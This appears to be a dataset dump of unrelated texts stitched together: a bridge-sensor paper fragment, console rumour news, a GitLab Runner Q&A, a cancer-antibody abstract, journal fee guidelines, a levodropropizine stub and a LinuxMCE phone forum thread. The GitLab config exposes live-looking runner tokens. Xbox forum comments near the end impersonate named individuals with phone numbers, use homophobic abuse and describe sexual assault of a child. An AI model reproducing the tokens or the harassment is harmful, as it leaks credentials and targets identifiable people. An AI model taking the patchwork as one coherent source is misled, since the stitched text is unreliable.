We can explain it by the increased rigidity of the upper part of the lateral surface caused by the diaphragm lip, perpendicular to the plane of the shell, which closes the top. 6 ![](sensors-18-04332-i006.jpg) Obstacles placed between the scanned object and a scanner device cause rifts in the point cloud structure. The breaches, so-called shadows, have been caused by people who passed through in front of the lateral surface of the bridge span during measurement. 7 ![](sensors-18-04332-i007.jpg) The diaphragm lip of the bridge is subject to rotation. sensors-18-04332-t003_Table 3 ###### Spheres translation method (STM) example: position change of the sphere SD2 in time (mm). Initial Deformed ----------------- --------------- --------------- Sphere code Sphere SD2_S1 Sphere SD2_S2 Set points zone 0.01 0.02 X −1.76 −1.77 Y 1.94 1.95 Z 0.05 0.05 sensors-18-04332-t004_Table 4 ###### Proof loading of the composite bridge: load combinations \[[@B8-sensors-18-04332]\]. Load Scheme Image Load Scheme Image ------------------- -------------------------------- --------------- -------------------------------- U1: 1 + 2 ![](sensors-18-04332-i008.jpg) U1: 2 + 3 + 4 ![](sensors-18-04332-i009.jpg) U1: 1 + 2 + 3 ![](sensors-18-04332-i010.jpg) U1: 3 + 4 ![](sensors-18-04332-i011.jpg) U1: 1 + 2 + 3 + 4 ![](sensors-18-04332-i012.jpg) U1: 4 ![](sensors-18-04332-i013.jpg)
null
minipile
NaturalLanguage
mit
null
[Update] According to Game Informer's Andrew Reiner, the PlayStation 5 target specs are higher than the Xbox Scarlett's, something which adds more fuel to the rumors circulating online.

[Original Story] The PlayStation 5 and Xbox Scarlett consoles have finally been unveiled, but details on both of them are currently quite scarce, as specs haven't been detailed so far. According to developers who have received dev kits for both systems, however, one of the two is definitely more powerful.

On the latest episode of his podcast, former IGN editor Colin Moriarty revealed that the PlayStation 5 is more powerful than the Xbox Scarlett, judging from reports of developers who have received the developer kits for both systems. While it's true that the final specs of consoles often differ from the ones seen in the dev kits, there's a good chance that this report is right, as this isn't the first time we have heard that Sony's next-gen console is going to be more powerful than Microsoft's system.

Developers have been praising Sony's new system quite a bit since its unveiling. Earlier this month, Yakuza series general director Toshihiro Nagoshi stated that the console has amazing processing power and that artificial intelligence and machine learning will play a central role.

The processing power of PlayStation 5 is incredible, so when we try to think of new gameplay that will utilize its full potential, I’m not really sure which aspects of existing mechanics we should translate. First there was a time when graphics improved, then there was network features, and now I guess you can say its a return to the “programmable” era? I think artificial intelligence and machine learning will continue to evolve.

The PlayStation 5 console will be released on a yet to be confirmed date.
null
minipile
NaturalLanguage
mit
null
Q: GitLab Runner - Docker Image

I started to work with GitLab CI/CD. I have set up my own GitLab runner with the docker executor. It is working fine. When I read about docker, I came to know that it creates a separate space for each run so that we could even access it and use it. I would like to know the path in which the docker images are created.

This is my config.toml:

concurrent = 1
check_interval = 0

[session_server]
  session_timeout = 1800

[[runners]]
  name = "Linux-Docker1"
  url = "https://gitlab.com/"
  token = "4-UWY1A_J2rS7r32wxJi"
  executor = "docker"
  builds_dir = "/var/working/gitlab-runner-docker"
  [runners.custom_build_dir]
  [runners.cache]
    [runners.cache.s3]
    [runners.cache.gcs]
  [runners.docker]
    tls_verify = false
    image = "ruby:2.6"
    privileged = false
    disable_entrypoint_overwrite = false
    oom_kill_disable = false
    disable_cache = false
    volumes = ["/cache"]
    shm_size = 0

[[runners]]
  name = "Linux-Shell1"
  url = "https://gitlab.com/"
  token = "LzdxrS1zA58rXihSQWCn"
  executor = "shell"
  builds_dir = "/var/working/gitlab-runner"
  [runners.custom_build_dir]
  [runners.cache]
    [runners.cache.s3]
    [runners.cache.gcs]

This is my .gitlab-ci.yml file:

stages:
  - build
  - test

build:
  stage: build
  script:
    - whoami
    - mkdir test-build
    - touch test-build/info.txt
    - ls
    - pwd
    - cd ..
    - pwd
    - ls
  artifacts:
    paths:
      - test-build/

test:
  stage: test
  script:
    - echo "Test Script"
    - ls
    - test -f "test-build/info.txt"

A: In your case you didn't create a docker image, because your build step does not run a docker build command. About the path: if you do build a docker image, you need to push it to a container registry (Docker Hub or a private one). Look at this doc to know how to do it: https://docs.gitlab.com/ee/ci/docker/using_docker_build.html
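To illustrate the answer, here is a minimal, hedged example of a job that actually builds an image and pushes it to the GitLab container registry, along the lines of the linked documentation. Note that the docker-in-docker service usually requires privileged = true on the runner (the config above has privileged = false), the CI_REGISTRY* variables are GitLab's predefined ones, and the job name and image tag are just placeholders.

build-image:
  stage: build
  image: docker:stable
  services:
    - docker:dind
  script:
    - docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" "$CI_REGISTRY"
    - docker build -t "$CI_REGISTRY_IMAGE:latest" .
    - docker push "$CI_REGISTRY_IMAGE:latest"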
null
minipile
NaturalLanguage
mit
null
The overall objective of this proposal is to develop a more effective therapeutic approach for the selective destruction of cancer cells. We propose to investigate the feasibility of combining the potential tumor specificity of monoclonal antibodies directed against tumor-associated antigens with the high linear energy transfer, short-range alpha radiations emitted in the decay of 211At. Astatine-211-labeled monoclonal antibodies offer the attractive possibility of matching the cellular specificity of an antibody with radiation of approximately cellular range. The antibody chosen for these studies is OC 125, a monoclonal antibody directed against a surface antigen present on human ovarian cancer cells. We have labeled OC 125 with I125, studied its interaction with human ovarian carcinoma cells in vitro and demonstrated selective uptake of I125 activity in human ovarian tumor implants in athymic mice. The specific aims are: (1) to label OC 125 with At211 using an acylation reaction without decreasing its affinity for ovarian cancer cells; (2) to measure the radiotoxicity of At211-labeled OC 125 in ovarian cancer cell lines; (3) to measure the therapeutic efficacy of At211-labeled OC 125 administered intraperitoneally to mice with malignant ascites; (4) to study the effects of several factors including antibody dose and circulating antigen level on the pharmacokinetics of labeled OC 125 and F(ab')2 and Fab' fragments in nude mouse models of ovarian cancer; and (5) to study the therapeutic utility of At211-labeled OC 125 in nude mice bearing human ovarian tumor xenografts. Although the proposed studies are limited to the study of in vitro and in vivo model systems, it is important to bear in mind that if the proposed experiments are successful, treatment of ovarian cancer might be possible via intraperitoneal and/or intravenous administration of At211-labeled antibodies.
null
minipile
NaturalLanguage
mit
null
Online Submissions

Registration and login are required to submit items online and to check the status of current submissions.

Author Guidelines

Jurnal Entomologi Indonesia receives two types of manuscript, i.e., articles and short communications. Details of manuscript preparation and submission are available in this link. The manuscript should be submitted together with a cover letter. The cover letter must be pasted in the "comments for the editor" (step 1, submission process). The manuscript will be rejected if it does not follow the guidelines or is not accompanied by the cover letter.

Submission Preparation Checklist

As part of the submission process, authors are required to check off their submission's compliance with all of the following items, and submissions may be returned to authors that do not adhere to these guidelines.

The manuscript has not been and is not being published in other scientific journals
The manuscript preparation has followed the writing guidelines of Jurnal Entomologi Indonesia
The cover letter has recommended at least three (3) names of reviewers to examine the manuscript
Text file formats are DOC or DOCX

Copyright Notice

Authors who publish in Jurnal Entomologi Indonesia agree to the following terms:

a. Authors retain copyright and grant the journal right of first publication with the work simultaneously licensed under a Creative Commons Attribution License that allows others to share the work with an acknowledgement of the work's authorship and initial publication in this journal.

b. Authors are able to enter into separate, additional contractual arrangements for the non-exclusive distribution of the journal's published version of the work, with an acknowledgement of its initial publication in this journal.

c. Authors are permitted and encouraged to post their work online prior to and during the submission process, as it can lead to productive exchanges, as well as earlier and greater citation of published work.

Privacy Statement

The names and email addresses entered in Jurnal Entomologi Indonesia will be used exclusively for the stated purposes of this journal and will not be made available for any other purpose or to any other party.

Author Fees

This journal charges the following author fees.

Article Submission: 0.00 (IDR)
Authors are required to pay an Article Submission Fee as part of the submission process to contribute to review costs.

Article Publication: 2000000.00 (IDR)
If this paper is accepted for publication, you will be asked to pay an Article Publication Fee to cover publication costs. The publishing cost is Rp 2.000.000 (maximally 10 pages for each article) for non-members of Perhimpunan Entomologi Indonesia (PEI). There will be an extra charge of Rp 150.000 per page for additional pages. If you are a member of PEI, the publishing cost is Rp 1.250.000 (maximally 10 pages for each article), with Rp 150.000 per extra page.

Additional fee for colour artwork: If there is colour artwork in your manuscript when it is accepted for publication, Jurnal Entomologi Indonesia requires you to pay an additional cost of Rp 300.000 per page before your paper can be published.

If you do not have funds to pay such fees, you will have an opportunity to waive each fee. We do not want fees to prevent the publication of worthy work.
null
minipile
NaturalLanguage
mit
null
If you've been wondering patiently what Xbox games you can play on your new Xbox 360 at launch time, your wait is finally over. Microsoft has released a list of Xbox games that will be backwards-compatible with the next-gen gaming console. The good news is that the Xvox 360 will be backwards-compatible with over 200 Xbox games at the November 22nd launch date. The better news is that original Xbox games will be displayed in 720p or 1080i High Definition Television format, so Xbox games will look even better on the 360. Be sure to check out what Xbox games will work on your Xbox 360 and which ones won't by looking at the Xbox backward-compatibility list for up-to-date info. Thanks to IGN for the heads-up. USER COMMENTS 66 comment(s) !ST POST(3:43pm EST Mon Nov 14 2005)Will the games be HD or will the 360 just send an HD feed for lower res. pics. - by LORDWICKET Sigh(3:45pm EST Mon Nov 14 2005)So to sum up what 'backward compatibility' has turned out to be for the 360: * There is no backwards compatibility.* Microsoft is essentially doing quick and easy ports of whatever titles they feel like* Whatever other titles will become available is up to the whim of Microsoft – and they were never keen on BC to begin with. Blah. - by Cheif well(3:57pm EST Mon Nov 14 2005)Halo 2 is on the list. im good to go. - by imExcitebike The list is incomplete(3:57pm EST Mon Nov 14 2005)It is a preliminary list that isn't through being updated, so sit back and watch it grow before your eyes. Cheif, did you read the list? I would say that your first fanboy bullet is incorrect. Your next two are assumptions based on your personal bias towards the system. - by Early Adopter early adopter(4:03pm EST Mon Nov 14 2005)that list is a final list. no more games will be updated. ms is a big company, they do what they want when they want. and they dont care. its not a secret or anything. - by ChuckyCheese XBOX 360 Backwards Compatability Titles…(4:04pm EST Mon Nov 14 2005)Just took a quick glance-over, wow… Missing A LOT of titles… Noticed one of my personal recent “fun” games “Destroy All Humans” was even missing… How were the titles chosen? Blah… No BLU-RAY or even the lesser HD-DVD, and not even planned backwards compatability? As I have a PC w/XBOX 360 controller and 7800 GTX – the PS3 and Revolution look like the consoles to watch for now! - by TYJK crappy(4:07pm EST Mon Nov 14 2005)I dont own a single game that is on that list. Also, I'm surprized that there are not more microsoft games supported. Notably Halo 1, and 2, and Jade Empire - by Whiskers early adopter(4:08pm EST Mon Nov 14 2005)MS are doing quick and easy ports, they have had to resort to providing 'profiles' to allow Xbox games to work on X360. Essentially the profile is a special purpose driver that emulates the specific NVidia features used in the game originally by translating/transforming the API calls to ATI compatible API calls. So ewach game on the list has been ported to the new box. Granted the game is not recompiled in PowerPC code, it's still native x86 code, but that's emulated too. It's a cool way to go about providing some measure of backward compat, especiallya s they were not originally going to offer it, and the graphics H/W is so different. I have no doubt that the list will grow some, but it will never offer the level of backwards compatability that Sony provided in the PS2, and seems commited to provide in PS3. Whether the degree of compatability and/or number of games 'up-ported' to X360 is sufficient for you I don't know. 
As the saying goes YMMV, personally I'd have said that they were better being clear and either doing BC in full of completely skipping it. Once again though, YMMV. - by X360 Cynic. Pretty sad(4:09pm EST Mon Nov 14 2005)I mean, to have to develop a new software emulator for each game kind of suggests that Microsoft didn't invest all that much time really in the new Xbox. They took a new CPU and Video card and slapped together another OEM box. I think the problem here is that MS burnt all their bridges with the co-developers of the Xbox, Intel and nVidia. In both cases, relations became strained, and as a result, MS couldn't go back and rely on these companies to come up with some hardware based emulator chip to be implemented in the Xbox360. It would have been nice for MS to simply throw in some embedded Pentium II CPU, a mobile nVidia GPU, and some Xbox-on-a-chip solution to support old XBox games. Considering all these technologies are now 5+ years old, you could probably squeeze them all onto one low-power chip. I.e. just like what the PS2 did to support the original PS games, put the PS on a chip and embedded it in the PS2. I doubt the xbox games supported won't run at full speed. Anything MS tries to emulate (re VirtualPC) runs slow as a dog, chances are most people won't want to run old Xbox games on the new 360. It was a nice attempt, and if they did manage to pull of full-speed emulations of their more popular titles like Halo, it could be beneficial, but this is definitely MS playing catchup to a feature that should have been designed into the Xbox360 from the start. Then again, how many “popular” titles have MS come out with that don't have Halo in the name? Hopefully Sony is watching and not planning some software based emulation scheme for PS2 games.- by Topher TYJK(4:12pm EST Mon Nov 14 2005)I have an ati radeon x800xl and it does about 200 million more triangles then the xbox 360 will but I dont even have 1/3rd of the the processing power since its going to a tri core 3.2 ghz + about 9.6 ghz so you cant discount it yet because your computer isnt going do do that well either. when it somes do it its the processor that really matters I only have a amd athlon 64 3500 granted and that is pretty decent but my computer wont perform nearly as well for it because the games wont be optimized like it is on a game cycle. As far as nintendo goes I hope that the inovation will work but I doubt that it will. and sony they will send you something defective littered in excuses - by mr. spock glanced too quick(4:15pm EST Mon Nov 14 2005)I take that back, upon looking closer Halo1&2 and Jade Empire are on the list. - by Whiskers badd(4:22pm EST Mon Nov 14 2005)An emulator? LMFAO. The games will look great in HD, but will lag just like any other emulator. Sony already takes the cake with backwards compatibility, and Nintendo is on the right track by opening up their catalog of games. M$ doesn't have clue.Sony = teh win - by FatSonyFanBoy And Another Thing(4:23pm EST Mon Nov 14 2005)Since these are new executables that you are going to have to download I am really suspicious if they will play exactly like the originals. I would want to hear from real gamers who are familiar with the games who can vouch that they really are the same games and not full of all sorts of subtle timing issues and other non-obvious differences. - by Cheif The games are FORWARD compatiable(4:25pm EST Mon Nov 14 2005)with the new conosle, rite? 
- by Cindy re: FSFB(4:39pm EST Mon Nov 14 2005) “This trend – started by Sony with the PS2, as backwards compatibility in home consoles was certainly not the norm before then – is set to continue with the PS3, which will offer emulation for the PS2 and hence for the PSone.” LMFAO.SONY DOESN'T HAVE A CLUE… EMULATION… WTF???SONY = THE LOSER. - by Just a few notes…(4:40pm EST Mon Nov 14 2005)This is list is by no means final, additional game profiles will be added for download through xboxlive. As Doug noted backwards compatible games will play at either 720p or 1080i, plus they will all have FSAA, so they should look quite a bit better than they did on the xbox. Bungie actually has screenshots of Halo with the upgrades: In all it's probably about as much as we could have hoped for. Keep in mind many consoles have had zero backwards compatibility. If they can add more titles I would imaqine they will be in pretty good shape. - by El Barto Can't believe this is a geek forum(4:48pm EST Mon Nov 14 2005)some of you have no idea how emulation works in terms of bc as for the PS3, if anyone gives their money to Sony for ANYTHING after the Malware debacle with their audio cds, then they are part of the problem with big corps. Make yourselves heard. Boycott Sony, don’t encourage their irresponsible behavior that has punished so many for buying their product legally. If you do buy a PS3, Beware the restrictive format that will be blu ray. You think they want to control their music content? Just think about their gaming content and how much potential dollars are involved. Your blu ray drive will be discussing your childhood and your favorite colors once you decide to network it with all of your other online devices. Sony is in the business to make money like the rest of them, unfortunately their business plan involves some very unfriendly consumer practices. It is a necessary evil when you make the hardware and the content. The difference between sony and apple is that apple has done it in a successful and consumer friendly manner, whereas sony just said “The consumer doesn’t even know what a rootkit is, why should they care if it get installed or not?” - by Early Adopter Halo(5:00pm EST Mon Nov 14 2005)Which of those two screenshot is better? 1) The original one with sharp textures and jaggies or 2) the 360 one with blurry textures and less jaggies ? I don't give a damn about minor graphic changes. I want to pop my xbox disk in the 360 and just play. I don't want to download anything. I don't want to wait for Microsoft to finally decide to take the trouble to port games. If Sony can do it and Nintendo is talking about doing it, WHY THE HELL CAN'T MICROSOFT. - by Cheif You can't play any backward games without a HD(5:10pm EST Mon Nov 14 2005)Xbox 360 old-game support needs hard drive – MS Microsoft has posted a list of 212 Xbox games that are backward-compatible with the Xbox 360 – but only next-generation consoles with a hard drive. - by huh(5:42pm EST Mon Nov 14 2005)yeah yeah yeah yeah, bla bla bla. you ppl downplay both 360 and ps3 now, but when the systems come out, your all gonna own a ps3,360, and revolution. all these systems are gonna be 100x more powerfull than their predecessors. just because the systems carries the ibm,ait,and nvidia brand name doesnt mean its gonna be another pc. nintendo,nec,sega all used chips that were once used for desktop computers in the early 80's. - by bla huh(5:56pm EST Mon Nov 14 2005)ooooooooooopssss. 
nevermind, ive seen pics of 360 games and they look a little better than xbox games,for now. damn the dinosaurs in kingkong for 360 look shitty.i guess they still cant give objects curves, they look like boxes. - by bla re: cheif(7:52pm EST Mon Nov 14 2005) there you go fanboy… ps2 is not 100% backwards compatible… and the ps2 model number SCPH-75000 does even play all ps2 games. I'm still waiting on sony to update certain PS1 games so I can play on my ps2 and I am waiting on sony to update certain ps2 games so I can play on my ps2. - by Sony…(8:59pm EST Mon Nov 14 2005)Ohh old sony, so nice… Not even the PS2 itself can play all games…WTF? yeah not even current compatibility, how can we hope for backwards? Sony consumers are either donkeys or retarded humans. - by says me Chief(9:11pm EST Mon Nov 14 2005)Chief you are a troll just like fatsonyfanboy, if you can't tell that 720p with 2x FSAA is better than 480p with no AA then you shouldn't be posting in this forum. That is hardly a “minor” graphics change as you claim. But guess what, if you don't like the 360 don't buy one, none of us are too worried about whether you have one or not. As far as the PS3 goes backwards compatibility is a non-issue for the time being it won't be out until xmas 06'…at the earliest. - by El Barto To the guy with no name…(10:34pm EST Mon Nov 14 2005)They give a list of the games that don't work in your link. Also, in your link, they say that short little list of games that don't work are out of 8000 titles. Third, this condition of certain specified games that don't work on the SCPH-75000 model of the Playstation 2, is specific to THAT model of Playstation 2. Models SCPH-70000 and earlier don't have that compatibility issue. You ARE right, though. The Playstation 2 is not 100% backward compatible, models aside. Most people know that. It's more like 99% backward compatible. ) About the Xbox360, it's bad enough it'll cost an extra 100 simoleons to play your old Xbox games, even worse when this addon will not make your Xbox360 even 25% compatible with Xbox games that you may already own. Good for me that I still own my original v1.1 Xbox. I suggest you guys relying on backward compatibility out of your Xbox360 to forget it. Just buy yourself a regular Xbox before Microsoft discontinues them next year. ) - by Ramza Beoulve I don't know what's worse… xbox 360 not being 100% backwards compatible with older gen xbox games… or ps2 not being 100% compatible with current gen ps2 games? you don't have to pay 100 “simoleons” to be 100% backwards compatible… if you own an xbox game, you must already own an xbox… now plug that into AV2 on your TV… and VOILA… 100% backwards compatibility… I know it's hard to comprehend… much harder than checking what model ps2 you are buying to make sure it is 100% compatible with the current gen games. - by Xbox 360.(1:43am EST Tue Nov 15 2005)Not nearly as much hype this time around. I think people were underwhelmed last time. Feels like there isn't nearly as much anticipation for any of the systems this time around. Or could it be that there are so many games that are basically a rehash of what we've seen a million times. Hopefully someone will come up with a fresh angle. - by bored only good game on X-box is(1:44am EST Tue Nov 15 2005)Only good game is nightcaster - by dd To the guy with no name…(3:11am EST Tue Nov 15 2005)“the important games are there… halo 1&2, jade empire, fable, gta 3 vice city and san andreas, the simpsons(both), ninja gaiden(both),…” Not to me, they aren't. 
I only have 4 Xbox games, and 2 of them are unplayable, as of yet, on the Xbox360. All are pretty high profile titles. “you don't have to pay 100 “simoleons” to be 100% backwards compatible… if you own an xbox game, you must already own an xbox… now plug that into AV2 on your TV… and VOILA… 100% backwards compatibility…” I wasn't speaking for myself. I mean those unfortunate of you who are banking on more than 25% of all the Xbox games out there being playable on an Xbox 360. “I know it's hard to comprehend… much harder than checking what model ps2 you are buying to make sure it is 100% compatible with the current gen games” As I said before, I addressed MY issue with backward compatibility in my previous post, so no need to repeat to me what I already stated. A couple of other things. The SCPH-75000 model Playstation 2 is a Japanese Playstation 2, so you don't have anything to worry about unless you live there, or import.. especially since you already know (I'm giving you the benefit of the doubt here) that only the SCPH-75000 models of Playstation 2 suffer from that incopatibility issue. Lastly, by the way, deducing what model Playstation 2 you have is as simple as looking at the label on the back. I know this may be hard for you to comprehend. - by Ramza Beoulve Controller(7:51am EST Tue Nov 15 2005) I hope to god that the new PS3 controller vibrates. I just love when I play my PS2 the controller goes all crazey on me and vibrates in my lap it just tickles my tushey and my lil walnuts. Oops sorry guys and gals this is a side of me that dosent get out very often so my boyfriend says.. - by FatSonyFanBoy Backwards compatability my arse!(8:49am EST Tue Nov 15 2005)I agree with Cheif. There is no Backwards compatability. Out of the box you will only be able to play ONE of the old Xbox games. You have to connect to Xbox live to download an emulator for each of the game you wish to play. Backwards compatability – what a load of rubbish. And also, I don't realy care, my last console was a SNES. - by MFBD re: u know(8:58am EST Tue Nov 15 2005)the ps2 model # SCPH-75000 does not play ATV offroad 3 and everquest… WTF… THEY ARE FRIGGIN PS2 SONY TITLES that don't play on a PS2. - by I know. do you? Re:Backwards compatability my arse!(10:52am EST Tue Nov 15 2005)Actually connecting to Live isn't the only way to get the updated profiles, you can download them and burn them to a CD from Xbox.com, or order a CD (yes you have to pay shipping and handling) and get the latest profiles from MS. Also you don't have to connect to the internet each time you put in an old game, only have to connect if the profile isn't in the last batch you have. Why all this hating on emulation? The Revolution is going to be doing the same thing and you have to repay (except Gamecube titles) for classic titles (no cartridge slot to use old games you may already have), also no one knows how Sony is going to do their backwards compatibility yet (haven't seen anything in the specs for the PS3 saying that it also has an Emotion engine in it along with Cell). The initial list isn't horrible, it has glaring omissions, but according to the MS they are still working on expanding it (I am ticked that Doom 3 and Jet Grind Radio aren't there, but they say more are coming). 
When I pick up the 360 I'm most likely going to be focused on Kameo and Condemned, but I'll also play old titles too, only a few won't work out for me, but then I'll fall back on the old Xbox, it'll be the same probably when I pick up a PS3, and the Revolution (thank god they are a year away my habit's going to drive me to the poor house LOL). - by ShadowSelf New Better Anyways(5:58pm EST Tue Nov 15 2005)They might release a update later on support more games. These news reports mean nothing! Anything is possible don't get caught up in all this crap. It's not that big of deal to make the games work on 360 it's just why? Are you tossing out the old XBOX? I play a game on the XBOX beat it then what keep playing same game over and over? I am ready for new games better graphics and sound I personally could care less I am putting the old XBOX in a spare room with all the old games. I rather rent them at least the ones I play to just beat it for the reason it was made. Only games I am gonna buy are online multiplayers and don't want to play Halo or Halo II on this machine if it doesn't take advantage of the HD experience! - by Just_Opinions why worry about backward compatibility(7:09pm EST Tue Nov 15 2005)The XBOX 360 is a huge system, and all the old games are pointless to play on the new one, they would look no different. The problem is games cost like 60 dollars which is pretty bad. I am getting the system and a couple of games for free so the backward compatibility doesn't matter.This site gives them away free with free shipping just for doing free offers through companies like AOL and stamps.com(USPS) its really a pretty easy site and it doesnt cost anything, check it out. - by z-dizzle I think(7:13am EST Wed Nov 16 2005)It's disapointing there is no backwards compatability out of the box. But I suppose the emulation is something at least, still, I think many people had higher hopes of backwards compatability that were not met. If I said anything wrong in my last post, then oh well, you don't actually have to know anything to post here :) - by MFBD ShadowSelf's comment(10:05am EST Wed Nov 16 2005)Dude, people who already own the xbox games aren't going to want to connect to the internet and get emulators for games (and the console) they might already own. With the revolution, you can download the games off the internet, games you may not have. My point is that its stupid to have to download emulators for games you already have that can be played on the last generation console, if you know what i mean. It's a good idea to download old classics that you don't have. Besides, i live in Butt F**k nowhere, ontario, canada, and don't have high speed internet where i live, so connecting to the internet or getting the emulators from mailing companies etc, is going to be a major pain in the butt just to play my Xbox games. - by Chrisguy Then again…(10:06am EST Wed Nov 16 2005)getting the old revolution games will be a pain as well too. DAMN YOU BELL AND YOUR CRAPPY DIAL UP!!! - by Chrisguy HAHAHHAAHA….(10:50am EST Wed Nov 16 2005)You must be a complete fucken lame ass if you dont have hi speed internet! And your a gamer. You limey ass lame retarded pudd wackers. Ive got the shizzel for hi speed and I wont have a problem with getten downloadable content. MS is looken toward the future you dweebs. So go spend some money and get the hi speed internet or fucken write your government if you live in BF egypt and tell them you want hi speed in your area. 
If you have the money hi speed will come - by DWEEB SLAYER Re: Chrisguy(8:55am EST Thu Nov 17 2005)Dude you don't have to connect to the internet to get the latest emulator profiles at all, as I stated you can get an update disk from Microsoft as well, you will have to pay shipping and handling in that case though. Also since the emulator upadates can be burned to a CD using a computer it would be possible to get a copy of them from a friend who does have a high speed connection. - by ShadowSelf xbox games to on the xbox 360(6:07pm EST Sat Nov 19 2005)I am asking to know what xbox games will work on the xbox 360 because I like the old xbox games as well as the xbox 360 games when will we know because there some games that I would like to buy on xbox 360 - by Darren Bacciochi XBOX 360(8:05pm EST Wed Dec 07 2005)XBOX owner and happy to be I haven't yet bought the 360 but I bet that sooner or later the XBOX platform games will rarefy compares to the Sony PS titles.I take for granted the huge amount of games available on PS2 while on XBOX just few. I believe the same will happen on the 360.I believe that even if Sony is developing blu ray well is just a fuckin games platform so sooner or later fuck the Xbox and go on Sony.More games is more fun! ya bunch of Wincks - by Big Daddy who cares?(4:19pm EST Thu Dec 08 2005)I just want to know how many people actually will play xbox games once they have a 360? i, and many of my mates bought a PS2 at launch, and i can 100& truthfully say that i put Gran Turismo 2 into it once to check that it actually was backward compatible (it was new at the time, had to see it to belive :p) and that was it, once the games were 5x better in ever department i never wanted to play any PS1 titles again on it! and neirther did any of my mates. I got a 360, i got PGR3 (so no need to play 1 or 2 anymore!) and perfect dark, that also voids ANY xbox FPS as it's so much better. Maybe it's just me and my circle of friends, and i can see some real classic, re-playable games that maybe of reason, but in genreal i don't see backwards compatiablity as a big selling point… “oh i can play my 20 ps2 games on the ps3, yippy!” …. if you think like this then why are you buying a PS3 if your going to be happy playing your current crop of games? Also to the xbox haters, of which there are many, i've had no problems with my 360 so far, it's slick as hell and online gaming is so much more fun as it actually works on this console! i still can enjoy a sony console, but unless they came up with some amazingly better, which in my eyes hasn't been proving so far, espically with them dodgy as hell new control pads, then i'm sticking with xbox. - by Barry And Also…..(4:24pm EST Thu Dec 08 2005)….the fact you can download classics like Gauntlet & Smash TV with many others to come has to be a great advantage for xbox 360? these are the classics i'd want to play, not ones i played and completed last year on my xbox. - by Barry My name……(6:35am EST Tue Dec 13 2005)My name is Glynn Cross. I am a boy of 16 years and I think I am a raging queen. I have innate tendencies to erotically seduce other males and do dirty things to their naked bodies. I love men, in other words. If you are ghey and want to hook up and bum, just give me a ring on 07765262823. ) - by The_Boy_Lover Glynn Cross(6:37am EST Tue Dec 13 2005)My name is Steve Woods and I want to hook up and bum. mmmmmmmmmmmmmm I think you sound well fit. xxxXxxx Love Ste. 
X - by The_Boy_Lover_Lover To those above me(6:53am EST Tue Dec 13 2005)My initials are JP and I also want to hook up with the two of you and I want a super hXc threesome with you too. I loves me some threesomes with boys. Mmhhmm I do. XxxxXxxxXxxxXxxxX - by JP Steven Woods(6:55am EST Tue Dec 13 2005)My name is Steve Woods. I am grossly homosexual and I am also a homosexual. I teach homosexualityology to boys and I am well ghey. I do physically LOVES the cack. Love Steve Kiss Kiss. (to the boys only!!!!!!!1) xxxxXxxxx - by Steven J. Woods glynn (the phag) cross(6:55am EST Tue Dec 13 2005)can i just say my name is glynn i really love to penatrate boys its the best thihng ever i remember the first time i did it whilst walkin home 1 day i saw a little boy crying i said wats up?? then for no reason ran off intot the woods and bumed him - by glynn cross ste the fatty(9:29am EST Tue Dec 13 2005)my name is steven woods i am sorry to say i am ghey i love the coc.k i am also very very large(fat) and have the smallest peanis on record. if u would like to bumme ring 07837547920 call me for some hot naked sweaty action or if u just wanna compare size - by steven woods Forwards compatibility(9:26am EST Tue Aug 08 2006)will xbox 360 games work on the original xbox? I am thinking about getting the xbox because I am short on money tight now. Since Microsoft had got to stop making xbox games sometime, I was wondering if the new games work on the old system. - by Randy backwards thing(5:23pm EST Thu Oct 12 2006)can you play xbox 360 games on ur xbox cuz i dont want to buy a xbox 360 and then all the games cuz they dont make anymore good xbox games - by joefred
null
minipile
NaturalLanguage
mit
null
Levodropropizine Levodropropizine is a cough suppressant. It is the levo isomer of dropropizine. It acts as a peripheral antitussive, with no action in the central nervous system. It does not cause side effects such as constipation or respiratory depression which can be produced by opioid antitussives such as codeine and its derivatives. References Category:Antitussives Category:Phenylpiperazines Category:Vicinal diols Category:Enantiopure drugs
null
minipile
NaturalLanguage
mit
null
When I first installed (snapshot 24098), there were some asterisk issues i.e. it didn't install. I have however since done that manually (I installed asterisk, pluto-asterisk and asterisk-pluto), and now I can at least access "phone lines" in webadmin. I've put in my credentials, but under status there is just a "," (a comma). In the past I have managed to get the line registered (although it must be said I have never actually got the phone working under LMCE.... but thought getting the line registered would be a good start). Ok, back to basics, because I am worried I am missing something simple here. I've no clue. 1. Does a phone need to be set up first in order to register the line? Should I be able to register the line independently of any phone setup? 2. I have a textbook network setup for LMCE - do I need to enter ANY settings at all on the Gigaset base station itself? Or should I just restore it to factory settings and then leave it alone? If yes, what settings exactly and from where? 3. The phone isn't detected; does it actually need to be added in web admin at all? It would be nice to get everything integrated, but to be honest my main concern is just getting notifications to work properly. okay, as far as I understand:1.) regardless of having registered an external phoneline, phones will be set up. Any MD has an integrated phone, which will be setup and registered automatically.Those phones could for example be used as an intercom. If you set up an external phoneline, then your "intercom" becomes a real telephone.2.) if you want to use your gigaset together with LMCE, you need to set it up manually in LMCE first. As far as I know, there is no template yet for this specific phone.So in order to set up your phone go to webadmin->phones->add device. From there you have to pick a template- either your phone is listed, or you use "Generic SIP softphone". This wil create the proper phone for you. You will then have a phonenumber and a password.3.)if you have done the above steps, you open the website for your gigaset and there you select an ip-connection (don't know with yours, but with mine I can define up to six connections) With this connection you use the phonenumber as both number for the extension as well as username.as for notifications, you probably need to do this in two steps:webadmin->telecom->call routing. There you can define what phones will ring for at home, do not disturb, away and sleepingthe other one is to edit the settings for the phoneline: once you have successfully registered a line with automatic configuration (for me sipgate.co.uk did actually work) you can click on settings. There you can change settings for armed-at home, armed-away, entertaining, sleeping and unarmed-athome. So this will give you proper notifications and you can select, that for example when watching TV or movie, you send your callers to a specific extension or straight to the mailbox I hope this will help you along a bit. But first I guess you have to get your asterisk running properly, or did you happen to fix it now? Thank for this information, that has made things a bit clearer in my head as to what goes where. I have no idea what's going on with asterisk. Some of the packages do not install during the initial Sarah setup screens, but I was able to install manually freepbx(?) and subsequently asterisk, which at least allowed me to access "phone lines" in web admin... 
